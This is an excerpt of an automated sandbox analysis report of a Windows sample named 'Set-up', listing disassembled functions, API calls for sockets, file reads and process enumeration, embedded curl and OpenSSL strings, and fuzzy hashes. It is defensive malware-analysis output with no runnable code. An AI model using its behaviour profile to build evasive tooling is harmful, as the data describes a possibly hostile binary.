                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: send$__acrt_iob_func_errnofflush
                                      • String ID: LIMIT %s:%d %s reached memlimit$N=Q$SEND %s:%d send(%lu) = %ld$multi.c$send
                                      • API String ID: 3540913164-1404432422
                                      • Opcode ID: 5dcdd38a008d4981715a7f0c42af303c1c97adb3bd8e6e3dc78f4f8d7b247c07
                                      • Instruction ID: 159ed3478328f49e43ecc166234c56d0cf9153cb0f8520ab33979565af24bdef
                                      • Opcode Fuzzy Hash: 5dcdd38a008d4981715a7f0c42af303c1c97adb3bd8e6e3dc78f4f8d7b247c07
                                      • Instruction Fuzzy Hash: 6411B9B49087187BE110ABA9AC4DF6F7F6CFB8BB68F040908F90957251D7719C4086B1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1335 6947b0-6947bf call 6ee5d0 1337 6947c4-6947dd strchr 1335->1337 1338 6947df-6947f2 call 68d520 1337->1338 1339 694824-69485e call 6c7120 call 6c7220 GetLastError call 6c7310 _errno 1337->1339 1345 6947f8-69481f call 68d690 call 68df50 1338->1345 1346 69488d-694896 fclose 1338->1346 1355 69486b-69488b call 6c7120 call 6c7220 1339->1355 1356 694860-694869 _errno 1339->1356 1351 6948c4-6948cb 1345->1351 1349 6948c2 1346->1349 1349->1351 1367 6948b8-6948bf call 6c7310 1355->1367 1356->1355 1358 694898-6948b3 call 6c7120 call 6c7220 1356->1358 1358->1367 1367->1349
                                      APIs
                                        • Part of subcall function 006EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE5E2
                                        • Part of subcall function 006EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 006EE5FA
                                        • Part of subcall function 006EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 006EE637
                                        • Part of subcall function 006EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0067A31E), ref: 006EE64D
                                        • Part of subcall function 006EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0067A31E,00000001,?,00000008,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000), ref: 006EE665
                                        • Part of subcall function 006EE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE678
                                        • Part of subcall function 006EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE685
                                        • Part of subcall function 006EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE690
                                        • Part of subcall function 006EE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0067A31E,?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E), ref: 006EE6A6
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00B54AB4), ref: 006947CC
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00B54AB4), ref: 0069483D
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00B54AB4), ref: 00694855
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00B54AB4), ref: 00694860
                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00B54AB4), ref: 0069488E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
                                      • String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
                                      • API String ID: 3063597995-203430365
                                      • Opcode ID: a8e252d910808f8a602bef18b8f1a5b0add6c53331586488d88843a92b7b5844
                                      • Instruction ID: e4708ca1d193110fa10222fb18ae1daa17c2f20745088c335142113b2c50cf7a
                                      • Opcode Fuzzy Hash: a8e252d910808f8a602bef18b8f1a5b0add6c53331586488d88843a92b7b5844
                                      • Instruction Fuzzy Hash: C72125A5F883407BE5A032643C07F2F368EDB52B49F0801A8FD09A42C3ED55991A45B7

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
                                      • API String ID: 420147892-2059488242
                                      • Opcode ID: ac26c90ca0b509f3d407240f083d0358749b0ca6d22dd20e416abd810dfc3dc8
                                      • Instruction ID: 3d14b65d1a6fdca5b8accec1a24ec4f04014c503b7eeeee8446ef624307d500f
                                      • Opcode Fuzzy Hash: ac26c90ca0b509f3d407240f083d0358749b0ca6d22dd20e416abd810dfc3dc8
                                      • Instruction Fuzzy Hash: CF3195B49056099FDB00EFB8C6856AEBBF0BF45314F008969E894A7241E7749A84CF52

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1394 517770-51778e 1395 517790-517797 1394->1395 1396 5177b6-5177c2 recv 1394->1396 1395->1396 1397 517799-5177a1 1395->1397 1398 5177c4-5177d9 call 5172a0 1396->1398 1399 51782e-517832 1396->1399 1401 5177a3-5177b4 recv 1397->1401 1402 5177db-517829 call 5172a0 __acrt_iob_func call 51cb20 fflush _errno 1397->1402 1398->1399 1401->1398 1402->1399
                                      APIs
                                      • recv.WS2_32(?,?,005494BF,?), ref: 005177AE
                                      • recv.WS2_32(?,?,005494BF,?), ref: 005177BA
                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 005177F1
                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00517815
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051781D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: recv$__acrt_iob_func_errnofflush
                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                      • API String ID: 2542159810-640788491
                                      • Opcode ID: 5af70e5bb59e2db87f7aca2ce373393c5d46ddd0203150d178a8f63ff2e6be07
                                      • Instruction ID: accd51c176418277ec14966e02566ed6923295f94153c1a80fc6abc29d4866b8
                                      • Opcode Fuzzy Hash: 5af70e5bb59e2db87f7aca2ce373393c5d46ddd0203150d178a8f63ff2e6be07
                                      • Instruction Fuzzy Hash: 6F11B6B8A082587BE110AB69DC4DF6B7F6CFB8AB68F040918F90993291D6719C40C6B1
                                      APIs
                                      • socket.WS2_32(?,?,?), ref: 00517618
                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00517659
                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0051767D
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00517685
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func_errnofflushsocket
                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                      • API String ID: 166263346-842387772
                                      • Opcode ID: d4038dcaa5780268a1434f2017e5c349e8d51b66f171d1c5cdbea516fea167d5
                                      • Instruction ID: 84de840e5e689644a022ac6fe498dd6548c80ff191226ae438abc8f43b433979
                                      • Opcode Fuzzy Hash: d4038dcaa5780268a1434f2017e5c349e8d51b66f171d1c5cdbea516fea167d5
                                      • Instruction Fuzzy Hash: 27110679A046257BE610AB6DAC0AF9F3FA4FF86734F040914FA15962A2D331C890C2A1
                                      APIs
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0089D1E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errno
                                      • String ID: @$Inf$NaN
                                      • API String ID: 2918714741-141429178
                                      • Opcode ID: 026cb0e7b7d26b8e5bf9cab6e23fdda91da89fdcbcb0b85817205753c15fa055
                                      • Instruction ID: b9a4eb515533afa600c73cfccee85bc4ffd6fca33c2e55605fd97e586ee45a94
                                      • Opcode Fuzzy Hash: 026cb0e7b7d26b8e5bf9cab6e23fdda91da89fdcbcb0b85817205753c15fa055
                                      • Instruction Fuzzy Hash: 51F1A17060C3958BDB21AF24C4807ABBBE1FB85318F198A2DE9DDC7381D7359905DB86
                                      APIs
                                        • Part of subcall function 005176A0: send.WS2_32(multi.c,?,?,?), ref: 005176DE
                                      • WSAGetLastError.WS2_32 ref: 005493C3
                                        • Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2
                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0054935C
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00549388
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                      • API String ID: 1798382672-2691795271
                                      • Opcode ID: a8280e554d9fe18e2796d7276708b6cc716f775ef1d5d72ec85e0bfe94f86af1
                                      • Instruction ID: 66d060ae000f97627111365c81c8db21df4c8c40f8f438043c26aa680271a49f
                                      • Opcode Fuzzy Hash: a8280e554d9fe18e2796d7276708b6cc716f775ef1d5d72ec85e0bfe94f86af1
                                      • Instruction Fuzzy Hash: 9251D274600305AFDB10DF24C886FAABBA5FF85718F148569FD488B292E770E991CB91
                                      APIs
                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00B1EBCD,00000000,00000000,?,?,?,005D9882,?,00000000), ref: 005D77DD
                                      • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 005D77F0
                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 005D7802
                                      • GetLastError.KERNEL32(?,00000000), ref: 005D780E
                                      • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 005D7830
                                      • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 005D7843
                                      • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005D786B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: fseek$ErrorLastfclosefopenfreadftell
                                      • String ID:
                                      • API String ID: 1915723720-0
                                      • Opcode ID: 5a64aa680baa76b2c60c957a61fdb10fabf19d74e86d562e5bc91245a25cdd3a
                                      • Instruction ID: b71674c6f53c821a4ab6f552eb7730fb9117aad51614d6c4bb0427fd16e4f54c
                                      • Opcode Fuzzy Hash: 5a64aa680baa76b2c60c957a61fdb10fabf19d74e86d562e5bc91245a25cdd3a
                                      • Instruction Fuzzy Hash: 931196E1E0930967EB3135295C4AB6B3D48FB95369F18043BFD05D6382F965D844D1B2
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 0054A1C6
                                      • WSAGetLastError.WS2_32 ref: 0054A1D0
                                        • Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D0A1
                                        • Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0A9
                                        • Part of subcall function 0052D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0CD
                                        • Part of subcall function 0052D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0D7
                                        • Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0052D381
                                        • Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0052D3A2
                                        • Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D3BF
                                        • Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D3C9
                                        • Part of subcall function 0052D090: SetLastError.KERNEL32(00000000), ref: 0052D3D4
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A21C
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A220
                                      Strings
                                      • getsockname() failed with errno %d: %s, xrefs: 0054A1F0
                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0054A23B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                      • API String ID: 2076026050-2605427207
                                      • Opcode ID: eb659a0edec0f4204cc2eb39b97cedd20768c1eb5b037ecadc722a77639d873d
                                      • Instruction ID: 11f9789d916c1c21b5312c327f8ac5678ec4bb17d96c82659c05127dcdf4484c
                                      • Opcode Fuzzy Hash: eb659a0edec0f4204cc2eb39b97cedd20768c1eb5b037ecadc722a77639d873d
                                      • Instruction Fuzzy Hash: A921D871848680BAF7259B28EC46FE677BCFF81328F040615F99853151FB72598587E2
                                      APIs
                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00513BA6,?,00C49044,00511BD2), ref: 005173A6
                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00513BA6,?,00C49044,00511BD2), ref: 005173CA
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00513BA6,?,00C49044,00511BD2), ref: 005173D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func_errnofflush
                                      • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
                                      • API String ID: 4185500129-1340350808
                                      • Opcode ID: 0f4a66e3dbb4cbe10affc63c5d03933def141476f2ac1bcc18a66144f00dfe4c
                                      • Instruction ID: 5846523bcbc45cacc8e181a8b80b96c14e85a3fd7403bb8eb7c4b19ce8b2efc3
                                      • Opcode Fuzzy Hash: 0f4a66e3dbb4cbe10affc63c5d03933def141476f2ac1bcc18a66144f00dfe4c
                                      • Instruction Fuzzy Hash: 5321D175A043196BE3209F59DC4AF9B7FA8FF8A764F08082CFD0992252E371D840C6A1
                                      APIs
                                      • WSAStartup.WS2_32(00000202), ref: 0052D65A
                                        • Part of subcall function 0052D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,0052D5FA,iphlpapi.dll), ref: 0052D699
                                        • Part of subcall function 0052D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 0052D6B5
                                        • Part of subcall function 0052D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00AFA7B4,?,?,0052D5FA,iphlpapi.dll), ref: 0052D6C3
